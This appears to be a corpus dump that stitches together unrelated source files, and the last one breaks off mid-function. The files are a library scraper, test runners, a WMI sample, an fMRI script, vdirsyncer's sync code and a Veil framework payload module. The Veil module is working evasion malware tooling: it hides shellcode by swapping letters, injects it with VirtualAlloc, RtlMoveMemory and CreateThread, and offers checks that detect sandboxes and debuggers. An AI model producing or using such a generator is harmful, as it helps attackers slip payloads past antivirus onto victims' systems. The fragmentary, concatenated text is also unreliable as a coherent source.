#print "stop timer", self, "from remote thread"
self.sigTimerStopRequested.emit()
def timerFinished(self):
self.timeout.emit() | mit | 4,284,573,127,986,131,500 | 37.073171 | 99 | 0.6225 | false | 4.383562 | false | false | false |
glaserti/LibraryTwitter | Python/1 - CSV from HTMLsource.py | 1 | 7213 | #
# Scraping website for information about libraries
#
# For getting information about the libraries, the database of the German Library Statistics (Deutsche Bibliotheksstatistik/DBS) which is hosted by the HBZ was used:
#
# http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/bibs.php
#
# For this project, 4 different requests were made:
#
# 1. DBS National Libraries ( == > 3 active<sup>(1)</sup> libraries)
# 1. DBS Section 4: University Libraries (i.e. not the entire Section 4 was queried) ( == > 83 active<sup>(2)</sup> libraries)
# 1. DBS Section 1: Public Libraries with population > 400,000 ( == > 18 libraries)<sup>(3)</sup>
# 1. DBS Section 2: Public Libraries with population > 100,000 ( == > 81 libraries)<sup>(4)</sup>
#
# Since the website doesn't give unique URLs for individual requests,
# you could download the source code of each database request and save them as html files.
#
# However, you could use the _printing page_ of the database result list, which returns
# an individual URL. This procedure is followed here, with the URLs given in the list of tuples "urlList".
#
# The result will be saved as a csv file for each database request to the cwd (i.e. current working directory).<sup>(5)</sup>
# Furthermore, those libraries without a valid url will be printed out (in a JSON prettyprint style).
#
# ---
#
# <sup>(1)</sup> In DBS National Libraries, there are actually four libraries listed, but one is inactive.
#
# <sup>(2)</sup> In DBS Section 4: University Libraries, there are actually 84 libraries listed, but one is inactive.
#
# <sup>(3)</sup> Two libraries were added manually to this goup of libraries: The Hamburger Bücherhallen, whose entry in DBS omitted the DBV Section, and the Zentral- und Landesbibliothek Berlin, which was listed as member of Section 4 "Wissenschaftliche Universalbibliotheken", though the library is member of Section 1 (and only guest member of Section 4 according to the DBV webpage (http://www.bibliotheksverband.de/mitglieder/).
#
# <sup>(4)</sup> From DBS Section 2, two libraries (KA119 and KA129) were removed: These are small volunteer-run ("ehrenamtlich geführte") libraries (fewer than 1,000 books) without any presence on the internet.
# For two more libraries (MB026 and GY440) the urls, missing in the DBS, were added manually.
#
# <sup>(5)</sup> To find out, what your cwd is, type:
#
# >```import os
# >print os.getcwd()```
#
# ---
#
# Data was collected: 2014-02-08
#
# List of URLs
#
# List of tuples of name & url
# urlList[0] = Nr. 1 (DBS National Libraries)
# urlList[1] = Nr. 2 (DBS Section 4, University Libraries)
# urlList[2] = Nr. 3 (DBS Section 1)
# urlList[3] = Nr. 4 (DBS Section 2)
urlList = [('DBS_NatBib', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AG012|AG292|AG000|AK001'),
('DBS_4_UB', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=EM482|AH715|EJ882|EX035|AA708|AG188|DB900|DE081|AD011|DB079|AF093|AH090|AA289|MM201|AF007|EL283|AJ082|AB294|AD291|AE088|AX001|AA046|AC018|AB105|AA083|EL131|AE830|AL091|AE027|BK213|AX566|AL352|AK517|EX461|AL005|AL017|AG061|AC006|AE003|AB038|AK384|AD473|AH703|AB361|AD084|AK104|AF020|AA290|DE100|SB005|AL029|AK025|AB026|AA009|AH089|AH016|AN087|AJ100|EL039|AC030|AE386|AA034|AJ008|BD987|AE015|BD296|AH077|AE180|AH004|AF019|AK700|AH466|AH739|AJ355|AH028|AL467|AB385|AJ021|BZ398|AC468|DC072|DA385|BE926|FH880'),
('DBS_1', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AJ197|GE486|AA381|AE131|AH478|AJ136|AE064|AK062|AG115|AB075|AJ380|AL480|AH132|AA277|AE362|AE106'),
('DBS_2', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AF111|MB026|GB291|AH259|GC556|KA119|KA129|GD895|AJ367|AF238|AD242|AD072|AG243|GY440|AA186|AB063|AH181|AD369|AC134|AF135|GE231|KS124|AL285|AF196|KQ152|AK116|AG279|AE295|AD217|GD822|AK153|GM675|AG267|AK293|AC286|AB178|AF275|AJ033|AL157|AC122|AJ471|WB861|LD510|GC283|AD059|MB038|AA174|AG371|AG231|LC499|LC505|AJ069|AG073|GB850|WB782|MB014|AH260|AH168|GC301|AJ264|GD998|GE012|GE036|MB002|GD767|AD163|AH351|AC262|GA444|GE462|GB746|AA472|GE899|AH247|AA447|AB270|GE164|GA596|AH284|AF470|AB142|AD229|JA868')]
#
# Functions
#
from bs4 import BeautifulSoup
import urllib2
import json
import csv
def writeDict(bsString):
s = bsString.lstrip() # stripping off leading whitespace
i1 = s.find("(DBS-ID: ")
i2 = i1 + len("(DBS-ID: ")
i3 = s.find(", Sig.") # if there is no Sig. given, i3 returns -1 [i.e. the closing paren ")"]
name = s[:i1-1]
i4 = name.find(' ') # to get the place, split name at first white space
dbsID = s[i2:i3]
place = name[:i4]
dic = {}
dic['DBS-ID'] = dbsID.encode("utf-8") # BeautifulSoup encodes in Unicode,
dic['Name'] = name.encode("utf-8") # which is not supported by csv;
dic['Ort'] = place.encode("utf-8") # hence encoding to utf-8 is necessary
dic['Twitter'] = ''
return dic
def findURL(soupTAG):
urlTAG = soupTAG.find_next("a")
url = urlTAG.get('href')
d = {}
d['URL'] = url.encode("utf-8")
return d
def parseHTML(soupHTML):
l = []
loD = []
s0 = soupHTML.table.table.h3
while type(s0) != type(None): # first write each entry which is not NoneType to a list
l.append(s0)
s_next = s0.find_next("h3")
s0 = s_next
for i in l:
url = findURL(i) # finding the next url for each entry
si = i.string # second write each string of the list which is not NoneType
if type(si) != type(None): # to a List of Dictionaries
di = writeDict(si)
di.update(url) # adding the url to the dict
loD.append(di)
else:
pass
return loD
def libCSV(index_of_urlList):
'''
pass as argument the index number of the urlList
prints out
(1.) Nr. of (active) libraries in the list
(2.) A JSON prettyprint list of libraries without a valid url
(3.) The name of the csv file.
Saves the csv file in the cwd.
'''
tup = urlList[index_of_urlList]
u = tup[1]
web = urllib2.urlopen(u)
webHTML = web.read()
web.close()
soup = BeautifulSoup(webHTML)
result = parseHTML(soup)
print 'For', tup[0], len(result), '(active) libraries could be found.'
for i in result:
if i["URL"] == "":
print 'For this library no URL could be found: \n'
print json.dumps(i, indent=1), '\n'
filename = tup[0] + '.csv'
    l1 = len(filename) + len('The csv will be saved as ')
print "\n"+ l1*"=" + "\n"
    print 'The csv will be saved as', filename
return exp2CSV(result, filename)
def exp2CSV(listOfDict, filename):
'''
arguments = list of dictionaries, filename
output = saves file to cwd (current working directory)
'''
outputfile = filename
keyz = listOfDict[0].keys()
f = open(outputfile,'w')
dict_writer = csv.DictWriter(f,keyz)
dict_writer.writer.writerow(keyz)
dict_writer.writerows(listOfDict)
f.close()
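# Illustrative usage sketch (not part of the original script): the header
# comments above describe four DBS requests; calling libCSV once per index of
# urlList writes one csv per request to the current working directory.
def write_all_csvs():
    for idx in range(len(urlList)):
        libCSV(idx)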
| mit | 6,047,267,657,044,713,000 | 43.239264 | 611 | 0.675912 | false | 2.966269 | false | false | false |
Veil-Framework/Veil | tools/evasion/payloads/python/shellcode_inject/letter_substitution.py | 1 | 9106 | """
Currently, this code takes normal shellcode and replaces a hex character
with a random non-hex letter. At runtime,
the executable reverses the letter substitution and executes the shellcode
Letter substitution code was adapted from:
http://www.tutorialspoint.com/python/string_maketrans.htm
Module built by @christruncer
Contributed to by @EdvardHolst
"""
import random
import string
from datetime import date
from datetime import timedelta
from tools.evasion.evasion_common import encryption
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import gamemaker
from tools.evasion.evasion_common import shellcode_help
class PayloadModule:
def __init__(self, cli_obj):
# required options
self.description = "A letter used in shellcode is replaced with a different letter. At runtime, the exe reverses the letter substitution and executes the shellcode"
self.language = "python"
self.rating = "Excellent"
self.extension = "py"
self.hex_letters = "abcdefx"
self.non_hex_letters = "ghijklmnopqrstuvwyz"
self.name = "Python Letter Substitution"
self.path = "python/shellcode_inject/letter_substitution"
self.shellcode = shellcode_help.Shellcode(cli_obj)
self.cli_opts = cli_obj
self.payload_source_code = ""
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
self.cli_shellcode = False
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"],
"INJECT_METHOD" : ["Virtual", "Virtual, Void, or Heap"],
"EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days"],
"HOSTNAME" : ["X", "Optional: Required system hostname"],
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"CLICKTRACK" : ["X", "Optional: Minimum number of clicks to execute payload"],
"UTCCHECK" : ["FALSE", "Optional: Validates system does not use UTC timezone"],
"VIRTUALFILES" : ["FALSE", "Optional: Check if VM supporting files exist"],
"VIRTUALDLLS" : ["FALSE", "Check for dlls loaded in memory"],
"CURSORMOVEMENT" : ["FALSE", "Check if cursor is in same position after 30 seconds"],
"USERPROMPT" : ["FALSE", "Make user click prompt prior to execution"],
"MINRAM" : ["FALSE", "Check for at least 3 gigs of RAM"],
"SANDBOXPROCESS" : ["FALSE", "Check for common sandbox processes"],
"DETECTDEBUG" : ["FALSE", "Check if debugger is present"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}
def generate(self):
# Random letter substition variables
encode_with_this = random.choice(self.hex_letters)
decode_with_this = random.choice(self.non_hex_letters)
# Generate Random Variable Names
subbed_shellcode_variable_name = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
rand_decoded_letter = evasion_helpers.randomString()
rand_correct_letter = evasion_helpers.randomString()
rand_sub_scheme = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('unicode_escape')
Shellcode = Shellcode.decode('ascii')
Shellcode = Shellcode.replace(encode_with_this, decode_with_this).replace('\\', '\\\\')
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# Add in the letter switching code
payload_code += '\t' * num_tabs_required + 'import codecs\n'
payload_code += '\t' * num_tabs_required + rand_decoded_letter + ' = b\'%s\'\n' % decode_with_this
payload_code += '\t' * num_tabs_required + rand_correct_letter + ' = b\'%s\'\n' % encode_with_this
payload_code += '\t' * num_tabs_required + rand_sub_scheme + ' = bytes.maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = b\'' + Shellcode.replace('\\\\', '\\') +'\'\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ', _ = codecs.escape_decode(' + subbed_shellcode_variable_name + ')\n'
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ subbed_shellcode_variable_name +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
# Create Payload File
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
| gpl-3.0 | -4,467,505,317,799,974,000 | 64.985507 | 336 | 0.613222 | false | 3.526723 | false | false | false |
dbarsam/python-vsgen | tests/__main__.py | 1 | 2305 | # -*- coding: utf-8 -*-
"""
This module executes vsgen unittests (i.e. all tests in the current folder). It exists as an alternative to the command line interface::
> python -m unittest discover --start-directory . --pattern test*.py
For more testing options see the unittest documentation available at https://docs.python.org/3.5/library/unittest.html.
This module exposes an __main__ entry point useful for test development (usually from a Python IDE) and is not recommended for normal test execution.
"""
import os
import sys
def main(argv=[]):
"""
Test main script
"""
import argparse
import unittest
parser = argparse.ArgumentParser(description='Executes the vsgen unit tests.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-n', '--testname', help='Specifies the test name to execute. This must be the fully qualified \'dotted\' path of the form \'package.module.class.function\' (e.g. \'tests.unit.test_feature.TestClass.test_function\'). If not provided all tests resolved from the internal test discovery process are executed.', action='append')
parser.add_argument('-f', '--testpattern', help='Specifies the test file pattern to execute during test discovery. If not provided all tests resolved from the internal test discovery process are executed.', default='test*.py')
parser.add_argument('-p', '--testpath', help='Specifies the test path for test discovery. If not provided, the internal test discovery uses the current directory.', default=os.path.dirname(os.path.realpath(__file__)))
args = parser.parse_args(argv[1:])
loader = unittest.TestLoader()
if args.testname:
testsuite = loader.loadTestsFromNames(args.testname)
else:
testsuite = loader.discover(args.testpath, args.testpattern)
runner = unittest.TextTestRunner(verbosity=2)
result = runner.run(testsuite)
return 0 if not result.failures and not result.errors else 1
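# Illustrative invocations (assumed, not part of the original module), e.g. when
# driving the entry point programmatically from an IDE console:
#
#   main(['-p', 'tests', '-f', 'test_*.py'])          # discovery with a pattern
#   main(['-n', 'tests.unit.test_feature.TestCase'])  # one fully qualified name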
if __name__ == '__main__':
# To use this package as an application we need to correct the sys.path
module_path = os.path.dirname(os.path.realpath(__file__))
package_path = os.path.normpath(os.path.join(module_path, '..'))
if package_path not in sys.path:
sys.path.append(package_path)
sys.exit(main(sys.argv))
| mit | 1,336,034,135,707,171,300 | 51.386364 | 351 | 0.71974 | false | 4.022688 | true | false | false |
pombredanne/https-gitlab.lrde.epita.fr-vcsn-vcsn | tests/python/complete.py | 1 | 1949 | #! /usr/bin/env python
import vcsn
from test import *
# check complete algorithm
# ------------------------
def check(i, o):
if isinstance(i, str):
i = vcsn.automaton(i)
CHECK(not i.is_complete())
o = vcsn.automaton(o)
CHECK(o.is_complete())
CHECK_EQ(o, i.complete())
# Idempotence.
CHECK_EQ(o, o.complete())
check('''
digraph
{
vcsn_context = "lal_char(abcd), b"
I -> 0
0 -> 1 [label = "a"]
0 -> 2 [label = "b"]
1 -> 2 [label = "c"]
2 -> F
}
''', '''
digraph
{
vcsn_context = "lal_char(abcd), b"
rankdir = LR
{
node [shape = point, width = 0]
I0
F2
}
{
node [shape = circle]
0
1
2
3 [color = DimGray]
}
I0 -> 0
0 -> 1 [label = "a"]
0 -> 2 [label = "b"]
0 -> 3 [label = "c, d", color = DimGray]
1 -> 2 [label = "c"]
1 -> 3 [label = "a, b, d", color = DimGray]
2 -> F2
2 -> 3 [label = "a, b, c, d", color = DimGray]
3 -> 3 [label = "a, b, c, d", color = DimGray]
}
''')
# An automaton with an open context.
check(vcsn.b.expression('a').standard(), '''
digraph
{
vcsn_context = "letterset<char_letters(a)>, b"
rankdir = LR
edge [arrowhead = vee, arrowsize = .6]
{
node [shape = point, width = 0]
I0
F1
}
{
node [shape = circle, style = rounded, width = 0.5]
0
1
2 [color = DimGray]
}
I0 -> 0
0 -> 1 [label = "a"]
1 -> F1
1 -> 2 [label = "a", color = DimGray]
2 -> 2 [label = "a", color = DimGray]
}
''')
# An automaton without initial state.
check('''
digraph
{
vcsn_context = "lal_char(a), b"
0 -> 0 [label = "a"]
0 -> F0
}
''', '''
digraph
{
vcsn_context = "lal_char(a), b"
rankdir = LR
{
node [shape = point, width = 0]
I1
F0
}
{
node [shape = circle]
0 [color = DimGray]
1 [color = DimGray]
}
I1 -> 1 [color = DimGray]
0 -> F0 [color = DimGray]
0 -> 0 [label = "a", color = DimGray]
1 -> 1 [label = "a", color = DimGray]
}
''')
| gpl-3.0 | 1,662,478,737,304,644,900 | 16.247788 | 55 | 0.50077 | false | 2.527886 | false | false | false |
fireeye/flare-wmi | python-cim/samples/show_CCM_RecentlyUsedApps.py | 1 | 2035 | import logging
from cim import CIM
from cim.objects import Namespace
def main(type_, path):
if type_ not in ("xp", "win7"):
raise RuntimeError("Invalid mapping type: {:s}".format(type_))
Values = ["FolderPath", "ExplorerFileName", "FileSize", "LastUserName", "LastUsedTime", "TimeZoneOffset",
"LaunchCount", "OriginalFileName", "FileDescription", "CompanyName", "ProductName", "ProductVersion",
"FileVersion", "AdditionalProductCodes", "msiVersion", "msiDisplayName", "ProductCode",
"SoftwarePropertiesHash", "ProductLanguage", "FilePropertiesHash", "msiPublisher"]
print("\t".join(Values))
c = CIM(type_, path)
try:
with Namespace(c, "root\\ccm\\SoftwareMeteringAgent") as ns:
for RUA in ns.class_("CCM_RecentlyUsedApps").instances:
RUAValues = []
for Value in Values:
try:
if Value == "LastUsedTime":
Time = str(RUA.properties[Value].value)
ExcelTime = "{}-{}-{} {}:{}:{}".format(Time[0:4], Time[4:6], Time[6:8], Time[8:10],
Time[10:12], Time[12:14])
RUAValues.append(ExcelTime)
elif Value == "TimeZoneOffset":
Time = str(RUA.properties[Value].value)
TimeOffset = '="{}"'.format(Time[-4:])
RUAValues.append(TimeOffset)
else:
RUAValues.append(str(RUA.properties[Value].value))
except KeyError:
RUAValues.append("")
print("\t".join(RUAValues))
except IndexError:
raise RuntimeError("CCM Software Metering Agent path 'root\\\\ccm\\\\SoftwareMeteringAgent' not found.")
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
import sys
main(*sys.argv[1:])
| apache-2.0 | -777,082,851,250,680,000 | 43.23913 | 115 | 0.519902 | false | 4.339019 | false | false | false |
poldrack/openfmri | openfmri_paper/2.8_make_allmean_file.py | 1 | 1497 | """
make alist of all contrasts/tasks
"""
import pickle
from get_contrasts_to_use import *
c=get_contrasts_to_use()
outdir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
infodir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
f=open(os.path.join(infodir,'task_keys.pkl'),'rb')
task_keys=pickle.load(f)
f.close()
f=open(os.path.join(infodir,'task_contrasts.pkl'),'rb')
contrasts=pickle.load(f)
f.close()
f=open(os.path.join(infodir,'task_conditions.pkl'),'rb')
condition_keys=pickle.load(f)
f.close()
taskctr={'ds001': {1: 1},
'ds002': {1: 2, 2: 3, 3: 4},
'ds003': {1: 5},
'ds005': {1: 6},
'ds006A': {1: 7},
'ds007': {1: 8, 2: 9, 3: 10},
'ds008': {1: 11, 2: 12},
'ds011': {1: 13, 2: 14, 3: 15, 4: 16},
'ds017': {2: 17},
'ds051': {1: 18},
'ds052': {1: 19, 2: 20},
'ds101': {1: 21},
'ds102': {1: 22},
'ds107': {1: 23}}
taskdict={}
for ds in taskctr.iterkeys():
for t in taskctr[ds].iterkeys():
taskdict[taskctr[ds][t]]=[ds,t,task_keys[ds]['task%03d'%t],c[ds][t][0],contrasts[ds]['task%03d'%t]['contrasts'][c[ds][t][0]]]
meanzstatdir='/corral-repl/utexas/poldracklab/openfmri/shared2/mean_zstat/'
outdir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
cmd='fslmerge -t %s/all_mean_zstat.nii.gz'%outdir
for t in range(1,24):
cmd += ' %s/mean_%s_task%03d_zstat%d_run1.nii.gz'%(meanzstatdir,taskdict[t][0],taskdict[t][1],taskdict[t][3])
print cmd
| bsd-2-clause | -8,475,441,843,590,455,000 | 27.245283 | 133 | 0.651971 | false | 2.275076 | false | false | false |
untitaker/vdirsyncer | vdirsyncer/sync/__init__.py | 1 | 11708 | # -*- coding: utf-8 -*-
'''
The `sync` function in `vdirsyncer.sync` can be called on two instances of
`Storage` to synchronize them. Apart from the defined errors, this is the only
public API of this module.
The algorithm is based on the blogpost "How OfflineIMAP works" by Edward Z.
Yang: http://blog.ezyang.com/2012/08/how-offlineimap-works/
Some modifications to it are explained in
https://unterwaditzer.net/2016/sync-algorithm.html
'''
import contextlib
import itertools
import logging
from ..exceptions import UserError
from ..utils import uniq
from .status import SubStatus, ItemMetadata
from .exceptions import BothReadOnly, IdentAlreadyExists, PartialSync, \
StorageEmpty, SyncConflict
sync_logger = logging.getLogger(__name__)
class _StorageInfo(object):
'''A wrapper class that holds prefetched items, the status and other
things.'''
def __init__(self, storage, status):
self.storage = storage
self.status = status
self._item_cache = {}
def prepare_new_status(self):
storage_nonempty = False
prefetch = []
def _store_props(ident, props):
try:
self.status.insert_ident(ident, props)
except IdentAlreadyExists as e:
raise e.to_ident_conflict(self.storage)
for href, etag in self.storage.list():
storage_nonempty = True
ident, meta = self.status.get_by_href(href)
if meta is None or meta.href != href or meta.etag != etag:
# Either the item is completely new, or updated
# In both cases we should prefetch
prefetch.append(href)
else:
# Metadata is completely identical
_store_props(ident, meta)
# Prefetch items
for href, item, etag in (self.storage.get_multi(prefetch)
if prefetch else ()):
if not item.is_parseable:
sync_logger.warning(
'Storage "{}": item {} is malformed. '
'Please try to repair it.'
.format(self.storage.instance_name, href)
)
_store_props(item.ident, ItemMetadata(
href=href,
hash=item.hash,
etag=etag
))
self.set_item_cache(item.ident, item)
return storage_nonempty
def is_changed(self, ident):
old_meta = self.status.get(ident)
if old_meta is None: # new item
return True
new_meta = self.status.get_new(ident)
return (
new_meta.etag != old_meta.etag and # etag changed
# item actually changed
(old_meta.hash is None or new_meta.hash != old_meta.hash)
)
def set_item_cache(self, ident, item):
actual_hash = self.status.get_new(ident).hash
assert actual_hash == item.hash
self._item_cache[ident] = item
def get_item_cache(self, ident):
return self._item_cache[ident]
def sync(storage_a, storage_b, status, conflict_resolution=None,
force_delete=False, error_callback=None, partial_sync='revert'):
'''Synchronizes two storages.
:param storage_a: The first storage
:type storage_a: :class:`vdirsyncer.storage.base.Storage`
:param storage_b: The second storage
:type storage_b: :class:`vdirsyncer.storage.base.Storage`
:param status: {ident: (href_a, etag_a, href_b, etag_b)}
metadata about the two storages for detection of changes. Will be
modified by the function and should be passed to it at the next sync.
If this is the first sync, an empty dictionary should be provided.
:param conflict_resolution: A function that, given two conflicting item
versions A and B, returns a new item with conflicts resolved. The UID
must be the same. The strings `"a wins"` and `"b wins"` are also
accepted to mean that side's version will always be taken. If none
is provided, the sync function will raise :py:exc:`SyncConflict`.
:param force_delete: When one storage got completely emptied between two
syncs, :py:exc:`StorageEmpty` is raised for
safety. Setting this parameter to ``True`` disables this safety
measure.
:param error_callback: Instead of raising errors when executing actions,
call the given function with an `Exception` as the only argument.
:param partial_sync: What to do when doing sync actions on read-only
storages.
- ``error``: Raise an error.
- ``ignore``: Those actions are simply skipped.
- ``revert`` (default): Revert changes on other side.
'''
if storage_a.read_only and storage_b.read_only:
raise BothReadOnly()
if conflict_resolution == 'a wins':
conflict_resolution = lambda a, b: a
elif conflict_resolution == 'b wins':
conflict_resolution = lambda a, b: b
status_nonempty = bool(next(status.iter_old(), None))
with status.transaction():
a_info = _StorageInfo(storage_a, SubStatus(status, 'a'))
b_info = _StorageInfo(storage_b, SubStatus(status, 'b'))
a_nonempty = a_info.prepare_new_status()
b_nonempty = b_info.prepare_new_status()
if status_nonempty and not force_delete:
if a_nonempty and not b_nonempty:
raise StorageEmpty(empty_storage=storage_b)
elif not a_nonempty and b_nonempty:
raise StorageEmpty(empty_storage=storage_a)
actions = list(_get_actions(a_info, b_info))
storage_a.buffered()
storage_b.buffered()
for action in actions:
try:
action.run(
a_info,
b_info,
conflict_resolution,
partial_sync
)
except Exception as e:
if error_callback:
error_callback(e)
else:
raise
storage_a.flush()
storage_b.flush()
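# Illustrative sketch (not part of vdirsyncer's public code): how a caller might
# wire up `sync`. `storage_a`, `storage_b` and `status` are assumed to be a
# Storage pair and a status object as described in the docstring above.
def _example_sync(storage_a, storage_b, status):
    # "a wins" makes conflicts resolve to storage_a's version of the item
    sync(storage_a, storage_b, status,
         conflict_resolution='a wins', partial_sync='revert')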
class Action:
def _run_impl(self, a, b): # pragma: no cover
raise NotImplementedError()
def run(self, a, b, conflict_resolution, partial_sync):
with self.auto_rollback(a, b):
if self.dest.storage.read_only:
if partial_sync == 'error':
raise PartialSync(self.dest.storage)
elif partial_sync == 'ignore':
self.rollback(a, b)
return
else:
assert partial_sync == 'revert'
self._run_impl(a, b)
@contextlib.contextmanager
def auto_rollback(self, a, b):
try:
yield
except BaseException as e:
self.rollback(a, b)
raise e
def rollback(self, a, b):
a.status.parent.rollback(self.ident)
class Upload(Action):
def __init__(self, item, dest):
self.item = item
self.ident = item.ident
self.dest = dest
def _run_impl(self, a, b):
if self.dest.storage.read_only:
href = etag = None
else:
sync_logger.info(u'Copying (uploading) item {} to {}'
.format(self.ident, self.dest.storage))
href, etag = self.dest.storage.upload(self.item)
assert href is not None
self.dest.status.insert_ident(self.ident, ItemMetadata(
href=href,
hash=self.item.hash,
etag=etag
))
class Update(Action):
def __init__(self, item, dest):
self.item = item
self.ident = item.ident
self.dest = dest
def _run_impl(self, a, b):
if self.dest.storage.read_only:
meta = ItemMetadata(hash=self.item.hash)
else:
sync_logger.info(u'Copying (updating) item {} to {}'
.format(self.ident, self.dest.storage))
meta = self.dest.status.get_new(self.ident)
meta.etag = \
self.dest.storage.update(meta.href, self.item, meta.etag)
self.dest.status.update_ident(self.ident, meta)
class Delete(Action):
def __init__(self, ident, dest):
self.ident = ident
self.dest = dest
def _run_impl(self, a, b):
meta = self.dest.status.get_new(self.ident)
if not self.dest.storage.read_only:
sync_logger.info(u'Deleting item {} from {}'
.format(self.ident, self.dest.storage))
self.dest.storage.delete(meta.href, meta.etag)
self.dest.status.remove_ident(self.ident)
class ResolveConflict(Action):
def __init__(self, ident):
self.ident = ident
def run(self, a, b, conflict_resolution, partial_sync):
with self.auto_rollback(a, b):
sync_logger.info(u'Doing conflict resolution for item {}...'
.format(self.ident))
meta_a = a.status.get_new(self.ident)
meta_b = b.status.get_new(self.ident)
if meta_a.hash == meta_b.hash:
sync_logger.info(u'...same content on both sides.')
elif conflict_resolution is None:
raise SyncConflict(ident=self.ident, href_a=meta_a.href,
href_b=meta_b.href)
elif callable(conflict_resolution):
item_a = a.get_item_cache(self.ident)
item_b = b.get_item_cache(self.ident)
new_item = conflict_resolution(item_a, item_b)
if new_item.hash != meta_a.hash:
Update(new_item, a).run(a, b, conflict_resolution,
partial_sync)
if new_item.hash != meta_b.hash:
Update(new_item, b).run(a, b, conflict_resolution,
partial_sync)
else:
raise UserError('Invalid conflict resolution mode: {!r}'
.format(conflict_resolution))
def _get_actions(a_info, b_info):
for ident in uniq(itertools.chain(a_info.status.parent.iter_new(),
a_info.status.parent.iter_old())):
a = a_info.status.get_new(ident)
b = b_info.status.get_new(ident)
if a and b:
a_changed = a_info.is_changed(ident)
b_changed = b_info.is_changed(ident)
